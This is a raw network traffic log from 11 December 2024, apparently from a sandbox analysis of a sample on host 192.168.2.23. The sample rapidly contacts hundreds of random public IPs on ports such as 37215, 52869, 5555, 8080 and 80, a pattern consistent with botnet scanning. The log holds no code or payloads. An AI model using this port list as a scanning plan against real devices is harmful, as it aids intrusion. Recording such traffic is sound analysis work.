                                                              Dec 11, 2024 00:43:18.092652082 CET513788080192.168.2.23113.145.142.202
                                                              Dec 11, 2024 00:43:18.092741966 CET84433876018.65.35.200192.168.2.23
                                                              Dec 11, 2024 00:43:18.092780113 CET387608443192.168.2.2318.65.35.200
                                                              Dec 11, 2024 00:43:18.092828989 CET491524821893.31.4.225192.168.2.23
                                                              Dec 11, 2024 00:43:18.092892885 CET4821849152192.168.2.2393.31.4.225
                                                              Dec 11, 2024 00:43:18.092926025 CET555552520140.9.134.133192.168.2.23
                                                              Dec 11, 2024 00:43:18.092964888 CET525205555192.168.2.23140.9.134.133
                                                              Dec 11, 2024 00:43:18.093039989 CET80552649.58.179.109192.168.2.23
                                                              Dec 11, 2024 00:43:18.093079090 CET5526480192.168.2.239.58.179.109
                                                              Dec 11, 2024 00:43:18.093362093 CET808054774204.81.207.188192.168.2.23
                                                              Dec 11, 2024 00:43:18.093395948 CET547748080192.168.2.23204.81.207.188
                                                              Dec 11, 2024 00:43:18.093421936 CET8050042137.151.78.143192.168.2.23
                                                              Dec 11, 2024 00:43:18.093462944 CET5004280192.168.2.23137.151.78.143
                                                              Dec 11, 2024 00:43:18.093542099 CET808051398210.181.40.142192.168.2.23
                                                              Dec 11, 2024 00:43:18.093584061 CET513988080192.168.2.23210.181.40.142
                                                              Dec 11, 2024 00:43:18.093641043 CET491524401279.10.209.34192.168.2.23
                                                              Dec 11, 2024 00:43:18.093703032 CET4401249152192.168.2.2379.10.209.34
                                                              Dec 11, 2024 00:43:18.093727112 CET808043226206.130.7.22192.168.2.23
                                                              Dec 11, 2024 00:43:18.093767881 CET432268080192.168.2.23206.130.7.22
                                                              Dec 11, 2024 00:43:18.093852043 CET8043836125.163.236.226192.168.2.23
                                                              Dec 11, 2024 00:43:18.093915939 CET4383680192.168.2.23125.163.236.226
                                                              Dec 11, 2024 00:43:18.093992949 CET80806074828.144.199.55192.168.2.23
                                                              Dec 11, 2024 00:43:18.094052076 CET607488080192.168.2.2328.144.199.55
                                                              Dec 11, 2024 00:43:18.094078064 CET491524540450.91.199.9192.168.2.23
                                                              Dec 11, 2024 00:43:18.094145060 CET4540449152192.168.2.2350.91.199.9
                                                              Dec 11, 2024 00:43:18.094173908 CET8060168220.15.89.10192.168.2.23
                                                              Dec 11, 2024 00:43:18.094213963 CET6016880192.168.2.23220.15.89.10
                                                              Dec 11, 2024 00:43:18.094297886 CET844333058140.81.126.115192.168.2.23
                                                              Dec 11, 2024 00:43:18.094346046 CET330588443192.168.2.23140.81.126.115
                                                              Dec 11, 2024 00:43:18.094357014 CET757446432203.29.198.208192.168.2.23
                                                              Dec 11, 2024 00:43:18.094394922 CET464327574192.168.2.23203.29.198.208
                                                              Dec 11, 2024 00:43:18.094486952 CET84435777635.36.155.170192.168.2.23
                                                              Dec 11, 2024 00:43:18.094526052 CET577768443192.168.2.2335.36.155.170
                                                              Dec 11, 2024 00:43:18.094559908 CET8054806143.186.21.173192.168.2.23
                                                              Dec 11, 2024 00:43:18.094599962 CET5480680192.168.2.23143.186.21.173
                                                              Dec 11, 2024 00:43:18.094715118 CET5286947372162.33.207.205192.168.2.23
                                                              Dec 11, 2024 00:43:18.094755888 CET4737252869192.168.2.23162.33.207.205
                                                              Dec 11, 2024 00:43:18.094763994 CET8034024193.94.36.43192.168.2.23
                                                              Dec 11, 2024 00:43:18.094799042 CET3402480192.168.2.23193.94.36.43
                                                              Dec 11, 2024 00:43:18.094906092 CET808053188118.35.168.154192.168.2.23
                                                              Dec 11, 2024 00:43:18.094952106 CET531888080192.168.2.23118.35.168.154
                                                              Dec 11, 2024 00:43:18.094975948 CET844344030137.27.133.90192.168.2.23
                                                              Dec 11, 2024 00:43:18.095020056 CET440308443192.168.2.23137.27.133.90
                                                              Dec 11, 2024 00:43:18.095082045 CET808055502187.147.83.5192.168.2.23
                                                              Dec 11, 2024 00:43:18.095118999 CET555028080192.168.2.23187.147.83.5
                                                              Dec 11, 2024 00:43:18.095252991 CET8039352222.38.112.228192.168.2.23
                                                              Dec 11, 2024 00:43:18.095295906 CET3935280192.168.2.23222.38.112.228
                                                              Dec 11, 2024 00:43:18.095381975 CET815671285.78.252.113192.168.2.23
                                                              Dec 11, 2024 00:43:18.095426083 CET8153212150.246.65.115192.168.2.23
                                                              Dec 11, 2024 00:43:18.095438957 CET5671281192.168.2.2385.78.252.113
                                                              Dec 11, 2024 00:43:18.095467091 CET5321281192.168.2.23150.246.65.115
                                                              Dec 11, 2024 00:43:18.095628023 CET8049094192.135.140.135192.168.2.23
                                                              Dec 11, 2024 00:43:18.095670938 CET4909480192.168.2.23192.135.140.135
                                                              Dec 11, 2024 00:43:18.095762968 CET372153855013.9.189.7192.168.2.23
                                                              Dec 11, 2024 00:43:18.095803022 CET3855037215192.168.2.2313.9.189.7
                                                              Dec 11, 2024 00:43:18.095860958 CET844353920196.115.212.171192.168.2.23
                                                              Dec 11, 2024 00:43:18.095900059 CET539208443192.168.2.23196.115.212.171
                                                              Dec 11, 2024 00:43:18.096004009 CET808039232106.44.250.26192.168.2.23
                                                              Dec 11, 2024 00:43:18.096044064 CET392328080192.168.2.23106.44.250.26
                                                              Dec 11, 2024 00:43:18.096124887 CET805933634.57.137.153192.168.2.23
                                                              Dec 11, 2024 00:43:18.096163988 CET5933680192.168.2.2334.57.137.153
                                                              Dec 11, 2024 00:43:18.096266985 CET805033283.96.191.136192.168.2.23
                                                              Dec 11, 2024 00:43:18.096307039 CET5033280192.168.2.2383.96.191.136
                                                              Dec 11, 2024 00:43:18.096347094 CET8080525285.244.147.234192.168.2.23
                                                              Dec 11, 2024 00:43:18.096386909 CET525288080192.168.2.235.244.147.234
                                                              Dec 11, 2024 00:43:18.096450090 CET803406616.29.234.244192.168.2.23
                                                              Dec 11, 2024 00:43:18.096498013 CET3406680192.168.2.2316.29.234.244
                                                              Dec 11, 2024 00:43:18.096582890 CET804553642.242.241.33192.168.2.23
                                                              Dec 11, 2024 00:43:18.096620083 CET4553680192.168.2.2342.242.241.33
                                                              Dec 11, 2024 00:43:18.096667051 CET8080406309.109.75.127192.168.2.23
                                                              Dec 11, 2024 00:43:18.096708059 CET406308080192.168.2.239.109.75.127
                                                              Dec 11, 2024 00:43:18.101497889 CET372154188862.217.115.182192.168.2.23
                                                              Dec 11, 2024 00:43:18.101541042 CET4188837215192.168.2.2362.217.115.182
                                                              Dec 11, 2024 00:43:18.116817951 CET372155540289.213.177.170192.168.2.23
                                                              Dec 11, 2024 00:43:18.116864920 CET5540237215192.168.2.2389.213.177.170
                                                              Dec 11, 2024 00:43:18.117032051 CET808041280215.50.246.23192.168.2.23
                                                              Dec 11, 2024 00:43:18.117093086 CET412808080192.168.2.23215.50.246.23
                                                              Dec 11, 2024 00:43:18.117238998 CET4915254080110.142.198.158192.168.2.23
                                                              Dec 11, 2024 00:43:18.117290020 CET5408049152192.168.2.23110.142.198.158
                                                              Dec 11, 2024 00:43:18.117360115 CET8058450148.225.57.169192.168.2.23
                                                              Dec 11, 2024 00:43:18.117419958 CET5845080192.168.2.23148.225.57.169
                                                              Dec 11, 2024 00:43:18.117438078 CET3721558484141.80.218.97192.168.2.23
                                                              Dec 11, 2024 00:43:18.117490053 CET5848437215192.168.2.23141.80.218.97
                                                              Dec 11, 2024 00:43:18.117569923 CET844356074139.77.12.175192.168.2.23
                                                              Dec 11, 2024 00:43:18.117611885 CET560748443192.168.2.23139.77.12.175
                                                              Dec 11, 2024 00:43:18.117640018 CET8041766179.117.226.194192.168.2.23
                                                              Dec 11, 2024 00:43:18.117686033 CET4176680192.168.2.23179.117.226.194
                                                              Dec 11, 2024 00:43:18.117706060 CET55554297490.197.2.27192.168.2.23
                                                              Dec 11, 2024 00:43:18.117744923 CET429745555192.168.2.2390.197.2.27
                                                              Dec 11, 2024 00:43:18.226424932 CET803567276.17.188.37192.168.2.23
                                                              Dec 11, 2024 00:43:18.226473093 CET3567280192.168.2.2376.17.188.37
                                                              Dec 11, 2024 00:43:18.226696968 CET844360024195.246.106.194192.168.2.23
                                                              Dec 11, 2024 00:43:18.226775885 CET372154021692.35.9.7192.168.2.23
                                                              Dec 11, 2024 00:43:18.226778984 CET600248443192.168.2.23195.246.106.194
                                                              Dec 11, 2024 00:43:18.226819038 CET4021637215192.168.2.2392.35.9.7
                                                              Dec 11, 2024 00:43:18.226850033 CET757438868141.202.115.162192.168.2.23
                                                              Dec 11, 2024 00:43:18.226891041 CET388687574192.168.2.23141.202.115.162
                                                              Dec 11, 2024 00:43:18.227041960 CET491525012632.170.33.253192.168.2.23
                                                              Dec 11, 2024 00:43:18.227082968 CET5012649152192.168.2.2332.170.33.253
                                                              Dec 11, 2024 00:43:18.227453947 CET5286944164131.95.252.218192.168.2.23
                                                              Dec 11, 2024 00:43:18.227492094 CET4416452869192.168.2.23131.95.252.218
                                                              Dec 11, 2024 00:43:18.227575064 CET804761038.95.163.205192.168.2.23
                                                              Dec 11, 2024 00:43:18.227613926 CET4761080192.168.2.2338.95.163.205
                                                              Dec 11, 2024 00:43:18.227650881 CET491523731447.69.248.12192.168.2.23
                                                              Dec 11, 2024 00:43:18.227689981 CET3731449152192.168.2.2347.69.248.12
                                                              Dec 11, 2024 00:43:18.227772951 CET8037392207.198.77.45192.168.2.23
                                                              Dec 11, 2024 00:43:18.227834940 CET3739280192.168.2.23207.198.77.45
                                                              Dec 11, 2024 00:43:18.227854967 CET528694825851.217.212.91192.168.2.23
                                                              Dec 11, 2024 00:43:18.227916956 CET4825852869192.168.2.2351.217.212.91
                                                              Dec 11, 2024 00:43:18.227951050 CET808033938202.202.168.64192.168.2.23
                                                              Dec 11, 2024 00:43:18.228003979 CET339388080192.168.2.23202.202.168.64
                                                              Dec 11, 2024 00:43:18.228040934 CET808057064158.123.170.118192.168.2.23
                                                              Dec 11, 2024 00:43:18.228106022 CET570648080192.168.2.23158.123.170.118
                                                              Dec 11, 2024 00:43:18.228173971 CET4915242856108.85.179.160192.168.2.23
                                                              Dec 11, 2024 00:43:18.228230953 CET4285649152192.168.2.23108.85.179.160
                                                              Dec 11, 2024 00:43:18.228405952 CET8056246152.117.85.253192.168.2.23
                                                              Dec 11, 2024 00:43:18.228485107 CET5624680192.168.2.23152.117.85.253
                                                              Dec 11, 2024 00:43:18.228540897 CET55555168254.78.250.89192.168.2.23
                                                              Dec 11, 2024 00:43:18.228579044 CET516825555192.168.2.2354.78.250.89
                                                              Dec 11, 2024 00:43:18.228645086 CET5286954874217.238.86.73192.168.2.23
                                                              Dec 11, 2024 00:43:18.228684902 CET5487452869192.168.2.23217.238.86.73
                                                              Dec 11, 2024 00:43:18.228745937 CET8039344205.19.156.154192.168.2.23
                                                              Dec 11, 2024 00:43:18.228787899 CET3934480192.168.2.23205.19.156.154
                                                              Dec 11, 2024 00:43:18.228951931 CET844339770182.89.16.0192.168.2.23
                                                              Dec 11, 2024 00:43:18.229000092 CET397708443192.168.2.23182.89.16.0
                                                              Dec 11, 2024 00:43:18.229034901 CET528693903261.2.36.48192.168.2.23
                                                              Dec 11, 2024 00:43:18.229073048 CET3903252869192.168.2.2361.2.36.48
                                                              Dec 11, 2024 00:43:18.229104996 CET4915239970217.176.190.109192.168.2.23
                                                              Dec 11, 2024 00:43:18.229146957 CET3997049152192.168.2.23217.176.190.109
                                                              Dec 11, 2024 00:43:18.229223013 CET8041916126.179.23.111192.168.2.23
                                                              Dec 11, 2024 00:43:18.229284048 CET4191680192.168.2.23126.179.23.111
                                                              Dec 11, 2024 00:43:18.241946936 CET808044056191.251.39.30192.168.2.23
                                                              Dec 11, 2024 00:43:18.241956949 CET814138485.146.86.114192.168.2.23
                                                              Dec 11, 2024 00:43:18.242002010 CET440568080192.168.2.23191.251.39.30
                                                              Dec 11, 2024 00:43:18.242002964 CET4138481192.168.2.2385.146.86.114
                                                              Dec 11, 2024 00:43:18.242094040 CET808041712180.236.218.223192.168.2.23
                                                              Dec 11, 2024 00:43:18.242158890 CET417128080192.168.2.23180.236.218.223
                                                              Dec 11, 2024 00:43:18.242214918 CET8054768171.2.151.108192.168.2.23
                                                              Dec 11, 2024 00:43:18.242269993 CET5476880192.168.2.23171.2.151.108
                                                              Dec 11, 2024 00:43:18.242439032 CET3721542464207.207.172.96192.168.2.23
                                                              Dec 11, 2024 00:43:18.242508888 CET4246437215192.168.2.23207.207.172.96
                                                              Dec 11, 2024 00:43:18.242528915 CET8443563783.26.211.195192.168.2.23
                                                              Dec 11, 2024 00:43:18.242568016 CET563788443192.168.2.233.26.211.195
                                                              Dec 11, 2024 00:43:18.242641926 CET8058674163.115.127.191192.168.2.23
                                                              Dec 11, 2024 00:43:18.242727995 CET5867480192.168.2.23163.115.127.191
                                                              Dec 11, 2024 00:43:18.242753983 CET491525657865.143.55.175192.168.2.23
                                                              Dec 11, 2024 00:43:18.242795944 CET5657849152192.168.2.2365.143.55.175
                                                              Dec 11, 2024 00:43:18.242938042 CET8033940168.174.53.247192.168.2.23
                                                              Dec 11, 2024 00:43:18.242983103 CET3394080192.168.2.23168.174.53.247
                                                              Dec 11, 2024 00:43:18.243012905 CET805565654.252.138.172192.168.2.23
                                                              Dec 11, 2024 00:43:18.243051052 CET5565680192.168.2.2354.252.138.172
                                                              Dec 11, 2024 00:43:18.243166924 CET80805776626.194.72.229192.168.2.23
                                                              Dec 11, 2024 00:43:18.243206024 CET577668080192.168.2.2326.194.72.229
                                                              Dec 11, 2024 00:43:18.243278027 CET80804188660.131.7.118192.168.2.23
                                                              Dec 11, 2024 00:43:18.243319035 CET418868080192.168.2.2360.131.7.118
                                                              Dec 11, 2024 00:43:18.243500948 CET555533290214.156.186.64192.168.2.23
                                                              Dec 11, 2024 00:43:18.243556023 CET332905555192.168.2.23214.156.186.64
                                                              Dec 11, 2024 00:43:18.243592978 CET5286951804193.245.80.68192.168.2.23
                                                              Dec 11, 2024 00:43:18.243649006 CET5180452869192.168.2.23193.245.80.68
                                                              Dec 11, 2024 00:43:18.243791103 CET4915240430214.6.88.200192.168.2.23
                                                              Dec 11, 2024 00:43:18.243835926 CET4043049152192.168.2.23214.6.88.200
                                                              Dec 11, 2024 00:43:18.243957043 CET491525772865.131.166.130192.168.2.23
                                                              Dec 11, 2024 00:43:18.244004011 CET5772849152192.168.2.2365.131.166.130
                                                              Dec 11, 2024 00:43:18.244024038 CET80805739666.186.235.199192.168.2.23
                                                              Dec 11, 2024 00:43:18.244051933 CET573968080192.168.2.2366.186.235.199
                                                              Dec 11, 2024 00:43:18.244112015 CET815021420.133.24.145192.168.2.23
                                                              Dec 11, 2024 00:43:18.244148970 CET5021481192.168.2.2320.133.24.145
                                                              Dec 11, 2024 00:43:18.244236946 CET8134002103.159.1.83192.168.2.23
                                                              Dec 11, 2024 00:43:18.244280100 CET3400281192.168.2.23103.159.1.83
                                                              Dec 11, 2024 00:43:18.244359970 CET80803762292.121.62.166192.168.2.23
                                                              Dec 11, 2024 00:43:18.244417906 CET376228080192.168.2.2392.121.62.166
                                                              Dec 11, 2024 00:43:18.244441986 CET8136122214.127.32.13192.168.2.23
                                                              Dec 11, 2024 00:43:18.244484901 CET3612281192.168.2.23214.127.32.13
                                                              Dec 11, 2024 00:43:18.244560957 CET8059574103.183.65.217192.168.2.23
                                                              Dec 11, 2024 00:43:18.244604111 CET5957480192.168.2.23103.183.65.217
                                                              Dec 11, 2024 00:43:18.244636059 CET555551422177.60.56.110192.168.2.23
                                                              Dec 11, 2024 00:43:18.244673967 CET514225555192.168.2.23177.60.56.110
                                                              Dec 11, 2024 00:43:18.244754076 CET3721547902215.149.25.71192.168.2.23
                                                              Dec 11, 2024 00:43:18.244791031 CET4790237215192.168.2.23215.149.25.71
                                                              Dec 11, 2024 00:43:18.244821072 CET55553352681.109.6.200192.168.2.23
                                                              Dec 11, 2024 00:43:18.244894028 CET335265555192.168.2.2381.109.6.200
                                                              Dec 11, 2024 00:43:18.245042086 CET84433593269.74.133.144192.168.2.23
                                                              Dec 11, 2024 00:43:18.245089054 CET359328443192.168.2.2369.74.133.144
                                                              Dec 11, 2024 00:43:18.245114088 CET808045140124.39.196.18192.168.2.23
                                                              Dec 11, 2024 00:43:18.245153904 CET451408080192.168.2.23124.39.196.18
                                                              Dec 11, 2024 00:43:18.245193005 CET757446876190.202.109.241192.168.2.23
                                                              Dec 11, 2024 00:43:18.245235920 CET468767574192.168.2.23190.202.109.241
                                                              Dec 11, 2024 00:43:18.245306969 CET3721536258170.243.90.64192.168.2.23
                                                              Dec 11, 2024 00:43:18.245347023 CET3625837215192.168.2.23170.243.90.64
                                                              Dec 11, 2024 00:43:18.245379925 CET49152462529.70.45.227192.168.2.23
                                                              Dec 11, 2024 00:43:18.245433092 CET4625249152192.168.2.239.70.45.227
                                                              Dec 11, 2024 00:43:18.245439053 CET844356236131.43.106.19192.168.2.23
                                                              Dec 11, 2024 00:43:18.245476007 CET562368443192.168.2.23131.43.106.19
                                                              Dec 11, 2024 00:43:18.245558023 CET8037292149.210.29.201192.168.2.23
                                                              Dec 11, 2024 00:43:18.245596886 CET3729280192.168.2.23149.210.29.201
                                                              Dec 11, 2024 00:43:18.245666027 CET80804153815.157.152.64192.168.2.23
                                                              Dec 11, 2024 00:43:18.245718956 CET415388080192.168.2.2315.157.152.64
                                                              Dec 11, 2024 00:43:18.245779991 CET844348844192.37.151.90192.168.2.23
                                                              Dec 11, 2024 00:43:18.245829105 CET488448443192.168.2.23192.37.151.90
                                                              Dec 11, 2024 00:43:18.245855093 CET4915234192121.19.25.76192.168.2.23
                                                              Dec 11, 2024 00:43:18.245914936 CET3419249152192.168.2.23121.19.25.76
                                                              Dec 11, 2024 00:43:18.245944023 CET80803652291.41.16.118192.168.2.23
                                                              Dec 11, 2024 00:43:18.245999098 CET365228080192.168.2.2391.41.16.118
                                                              Dec 11, 2024 00:43:18.246083021 CET8156900118.137.245.66192.168.2.23
                                                              Dec 11, 2024 00:43:18.246139050 CET5690081192.168.2.23118.137.245.66
                                                              Dec 11, 2024 00:43:18.246215105 CET7574450003.254.159.181192.168.2.23
                                                              Dec 11, 2024 00:43:18.246262074 CET450007574192.168.2.233.254.159.181
                                                              Dec 11, 2024 00:43:18.246385098 CET757450500215.47.78.226192.168.2.23
                                                              Dec 11, 2024 00:43:18.246426105 CET505007574192.168.2.23215.47.78.226
                                                              Dec 11, 2024 00:43:18.246512890 CET5286957932101.125.216.151192.168.2.23
                                                              Dec 11, 2024 00:43:18.246551037 CET5793252869192.168.2.23101.125.216.151
                                                              Dec 11, 2024 00:43:18.246611118 CET3721544034164.98.152.87192.168.2.23
                                                              Dec 11, 2024 00:43:18.246646881 CET4403437215192.168.2.23164.98.152.87
                                                              Dec 11, 2024 00:43:18.246675968 CET808040996207.144.197.158192.168.2.23
                                                              Dec 11, 2024 00:43:18.246737957 CET409968080192.168.2.23207.144.197.158
                                                              Dec 11, 2024 00:43:18.246783018 CET8056796121.202.179.6192.168.2.23
                                                              Dec 11, 2024 00:43:18.246826887 CET5679680192.168.2.23121.202.179.6
                                                              Dec 11, 2024 00:43:18.246896982 CET75745225845.27.188.99192.168.2.23
                                                              Dec 11, 2024 00:43:18.246934891 CET522587574192.168.2.2345.27.188.99
                                                              Dec 11, 2024 00:43:18.246969938 CET808057208119.7.140.192192.168.2.23
                                                              Dec 11, 2024 00:43:18.247026920 CET572088080192.168.2.23119.7.140.192
                                                              Dec 11, 2024 00:43:18.247111082 CET80331626.218.88.254192.168.2.23
                                                              Dec 11, 2024 00:43:18.247150898 CET3316280192.168.2.236.218.88.254
                                                              Dec 11, 2024 00:43:18.247184038 CET555552166157.149.9.22192.168.2.23
                                                              Dec 11, 2024 00:43:18.247250080 CET521665555192.168.2.23157.149.9.22
                                                              Dec 11, 2024 00:43:18.247273922 CET804522217.224.44.220192.168.2.23
                                                              Dec 11, 2024 00:43:18.247337103 CET4522280192.168.2.2317.224.44.220
                                                              Dec 11, 2024 00:43:18.247385025 CET8040804102.112.159.159192.168.2.23
                                                              Dec 11, 2024 00:43:18.247422934 CET4080480192.168.2.23102.112.159.159
                                                              Dec 11, 2024 00:43:18.247482061 CET80803795690.24.179.163192.168.2.23
                                                              Dec 11, 2024 00:43:18.247533083 CET379568080192.168.2.2390.24.179.163
                                                              Dec 11, 2024 00:43:18.247579098 CET4915259228123.175.241.125192.168.2.23
                                                              Dec 11, 2024 00:43:18.247620106 CET5922849152192.168.2.23123.175.241.125
                                                              Dec 11, 2024 00:43:18.247667074 CET3721553088169.80.247.56192.168.2.23
                                                              Dec 11, 2024 00:43:18.247718096 CET5308837215192.168.2.23169.80.247.56
                                                              Dec 11, 2024 00:43:18.247756958 CET808037224106.176.156.149192.168.2.23
                                                              Dec 11, 2024 00:43:18.247795105 CET372248080192.168.2.23106.176.156.149
                                                              Dec 11, 2024 00:43:18.247864962 CET491524627076.227.143.215192.168.2.23
                                                              Dec 11, 2024 00:43:18.247905970 CET4627049152192.168.2.2376.227.143.215
                                                              Dec 11, 2024 00:43:18.247936964 CET4915243262113.146.56.79192.168.2.23
                                                              Dec 11, 2024 00:43:18.248008966 CET84435181280.42.221.252192.168.2.23
                                                              Dec 11, 2024 00:43:18.248029947 CET4326249152192.168.2.23113.146.56.79
                                                              Dec 11, 2024 00:43:18.248060942 CET518128443192.168.2.2380.42.221.252
                                                              Dec 11, 2024 00:43:18.248111010 CET8042494221.40.54.221192.168.2.23
                                                              Dec 11, 2024 00:43:18.248152971 CET4249480192.168.2.23221.40.54.221
                                                              Dec 11, 2024 00:43:18.248220921 CET757454190131.214.104.215192.168.2.23
                                                              Dec 11, 2024 00:43:18.248272896 CET541907574192.168.2.23131.214.104.215
                                                              Dec 11, 2024 00:43:18.248297930 CET805147031.124.239.80192.168.2.23
                                                              Dec 11, 2024 00:43:18.248326063 CET5147080192.168.2.2331.124.239.80
                                                              Dec 11, 2024 00:43:18.248399019 CET815413242.208.199.211192.168.2.23
                                                              Dec 11, 2024 00:43:18.248437881 CET5413281192.168.2.2342.208.199.211
                                                              Dec 11, 2024 00:43:18.248490095 CET55554765630.227.89.81192.168.2.23
                                                              Dec 11, 2024 00:43:18.248529911 CET476565555192.168.2.2330.227.89.81
                                                              Dec 11, 2024 00:43:18.248675108 CET372154233872.93.110.172192.168.2.23
                                                              Dec 11, 2024 00:43:18.248733044 CET4233837215192.168.2.2372.93.110.172
                                                              Dec 11, 2024 00:43:18.248754025 CET55554613476.51.22.34192.168.2.23
                                                              Dec 11, 2024 00:43:18.248830080 CET461345555192.168.2.2376.51.22.34
                                                              Dec 11, 2024 00:43:18.248867989 CET805906667.156.164.38192.168.2.23
                                                              Dec 11, 2024 00:43:18.248918056 CET5906680192.168.2.2367.156.164.38
                                                              Dec 11, 2024 00:43:18.248939037 CET757458324201.200.12.116192.168.2.23
                                                              Dec 11, 2024 00:43:18.248985052 CET583247574192.168.2.23201.200.12.116
                                                              Dec 11, 2024 00:43:18.249042034 CET528695106673.124.161.55192.168.2.23
                                                              Dec 11, 2024 00:43:18.249102116 CET5106652869192.168.2.2373.124.161.55
                                                              Dec 11, 2024 00:43:18.249125957 CET8059380212.148.153.192192.168.2.23
                                                              Dec 11, 2024 00:43:18.249169111 CET5938080192.168.2.23212.148.153.192
                                                              Dec 11, 2024 00:43:18.249227047 CET80805234277.93.207.38192.168.2.23
                                                              Dec 11, 2024 00:43:18.249264002 CET523428080192.168.2.2377.93.207.38
                                                              Dec 11, 2024 00:43:18.249588013 CET808046434183.37.186.197192.168.2.23
                                                              Dec 11, 2024 00:43:18.249628067 CET464348080192.168.2.23183.37.186.197
                                                              Dec 11, 2024 00:43:18.283960104 CET5449080192.168.2.23172.27.14.53
                                                              Dec 11, 2024 00:43:18.284368992 CET3933080192.168.2.2337.106.97.86
                                                              Dec 11, 2024 00:43:18.284699917 CET5522680192.168.2.23106.200.247.40
                                                              Dec 11, 2024 00:43:18.285075903 CET367888080192.168.2.2381.14.183.229
                                                              Dec 11, 2024 00:43:18.285454035 CET4833280192.168.2.23172.201.78.230
                                                              Dec 11, 2024 00:43:18.285845041 CET4145280192.168.2.23190.79.230.37
                                                              Dec 11, 2024 00:43:18.286200047 CET3725480192.168.2.23103.127.156.92
                                                              Dec 11, 2024 00:43:18.286581993 CET3448480192.168.2.2381.152.153.104
                                                              Dec 11, 2024 00:43:18.286947012 CET4832037215192.168.2.2395.187.185.8
                                                              Dec 11, 2024 00:43:18.287319899 CET3763480192.168.2.2375.88.145.147
                                                              Dec 11, 2024 00:43:18.287683010 CET564685555192.168.2.23133.86.189.70
                                                              Dec 11, 2024 00:43:18.288047075 CET443108080192.168.2.23191.118.66.148
                                                              Dec 11, 2024 00:43:18.288517952 CET507468080192.168.2.23117.194.49.127
                                                              Dec 11, 2024 00:43:18.288794041 CET4850680192.168.2.2387.186.17.243
                                                              Dec 11, 2024 00:43:18.289187908 CET3351880192.168.2.2364.246.130.65
                                                              Dec 11, 2024 00:43:18.289546967 CET4043281192.168.2.23198.74.93.127
                                                              Dec 11, 2024 00:43:18.289920092 CET3564252869192.168.2.2359.92.247.206
                                                              Dec 11, 2024 00:43:18.290266037 CET567668080192.168.2.23148.104.170.209
                                                              Dec 11, 2024 00:43:18.290642977 CET408568080192.168.2.2323.210.109.40
                                                              Dec 11, 2024 00:43:18.291016102 CET5503437215192.168.2.23169.30.77.109
                                                              Dec 11, 2024 00:43:18.291392088 CET4835480192.168.2.23162.154.175.138
                                                              Dec 11, 2024 00:43:18.291766882 CET446488443192.168.2.2387.32.48.189
                                                              Dec 11, 2024 00:43:18.292145014 CET6089252869192.168.2.2345.153.216.8
                                                              Dec 11, 2024 00:43:18.292145014 CET5367281192.168.2.2358.49.123.103
                                                              Dec 11, 2024 00:43:18.292511940 CET555528080192.168.2.23109.171.62.170
                                                              Dec 11, 2024 00:43:18.292874098 CET4056280192.168.2.2353.197.184.64
                                                              Dec 11, 2024 00:43:18.293241978 CET4450681192.168.2.2326.22.241.69
                                                              Dec 11, 2024 00:43:18.293620110 CET3336880192.168.2.23150.143.19.210
                                                              Dec 11, 2024 00:43:18.293979883 CET354428080192.168.2.23145.145.175.50
                                                              Dec 11, 2024 00:43:18.294348001 CET347325555192.168.2.23198.246.28.145
                                                              Dec 11, 2024 00:43:18.294725895 CET484608443192.168.2.23135.51.122.231
                                                              Dec 11, 2024 00:43:18.295103073 CET5600080192.168.2.23156.9.96.43
                                                              Dec 11, 2024 00:43:18.295480013 CET4393480192.168.2.23136.165.68.160
                                                              Dec 11, 2024 00:43:18.295844078 CET5081837215192.168.2.2313.209.203.228
                                                              Dec 11, 2024 00:43:18.296215057 CET572108443192.168.2.23142.213.93.241
                                                              Dec 11, 2024 00:43:18.296581984 CET573928080192.168.2.23168.22.178.161
                                                              Dec 11, 2024 00:43:18.296958923 CET378388080192.168.2.2368.182.174.204
                                                              Dec 11, 2024 00:43:18.297318935 CET598208443192.168.2.23159.112.33.196
                                                              Dec 11, 2024 00:43:18.297687054 CET602028080192.168.2.23169.70.235.203
                                                              Dec 11, 2024 00:43:18.298058033 CET414888080192.168.2.2328.130.196.141
                                                              Dec 11, 2024 00:43:18.298423052 CET451008443192.168.2.2392.27.66.191
                                                              Dec 11, 2024 00:43:18.298793077 CET4221252869192.168.2.2353.169.246.148
                                                              Dec 11, 2024 00:43:18.299164057 CET345048080192.168.2.23203.246.201.178
                                                              Dec 11, 2024 00:43:18.299530983 CET3441680192.168.2.23212.59.33.56
                                                              Dec 11, 2024 00:43:18.299890041 CET398008080192.168.2.23205.55.79.236
                                                              Dec 11, 2024 00:43:18.300261021 CET538028080192.168.2.2345.210.95.218
                                                              Dec 11, 2024 00:43:18.300632000 CET357007574192.168.2.23115.248.197.146
                                                              Dec 11, 2024 00:43:18.300632000 CET5899849152192.168.2.23222.31.51.54
                                                              Dec 11, 2024 00:43:18.301001072 CET367287574192.168.2.2360.31.41.49
                                                              Dec 11, 2024 00:43:18.301367998 CET3757680192.168.2.23221.127.103.77
                                                              Dec 11, 2024 00:43:18.301742077 CET384488443192.168.2.2371.132.127.112
                                                              Dec 11, 2024 00:43:18.301748037 CET504785555192.168.2.2349.122.11.82
                                                              Dec 11, 2024 00:43:18.302120924 CET4942437215192.168.2.23195.121.56.192
                                                              Dec 11, 2024 00:43:18.302484989 CET5246080192.168.2.23199.190.42.216
                                                              Dec 11, 2024 00:43:18.302859068 CET3933237215192.168.2.23196.110.129.112
                                                              Dec 11, 2024 00:43:18.303242922 CET5015849152192.168.2.23220.74.77.186
                                                              Dec 11, 2024 00:43:18.303244114 CET5326280192.168.2.23137.77.114.156
                                                              Dec 11, 2024 00:43:18.303603888 CET3419881192.168.2.23183.170.83.140
                                                              Dec 11, 2024 00:43:18.303956032 CET529568080192.168.2.2334.155.65.192
                                                              Dec 11, 2024 00:43:18.304321051 CET354048080192.168.2.2331.125.159.69
                                                              Dec 11, 2024 00:43:18.304698944 CET5624480192.168.2.23125.138.41.164
                                                              Dec 11, 2024 00:43:18.305072069 CET5876280192.168.2.23110.215.176.196
                                                              Dec 11, 2024 00:43:18.305424929 CET357988443192.168.2.23206.100.116.9
                                                              Dec 11, 2024 00:43:18.305798054 CET3307037215192.168.2.23216.243.102.141
                                                              Dec 11, 2024 00:43:18.306159019 CET3342052869192.168.2.23209.95.98.5
                                                              Dec 11, 2024 00:43:18.306529045 CET4543052869192.168.2.231.146.114.34
                                                              Dec 11, 2024 00:43:18.306899071 CET4791252869192.168.2.23107.123.240.5
                                                              Dec 11, 2024 00:43:18.307276964 CET545367574192.168.2.2348.84.204.236
                                                              Dec 11, 2024 00:43:18.307640076 CET4934881192.168.2.23221.168.65.137
                                                              Dec 11, 2024 00:43:18.308017969 CET4676080192.168.2.23103.136.18.241
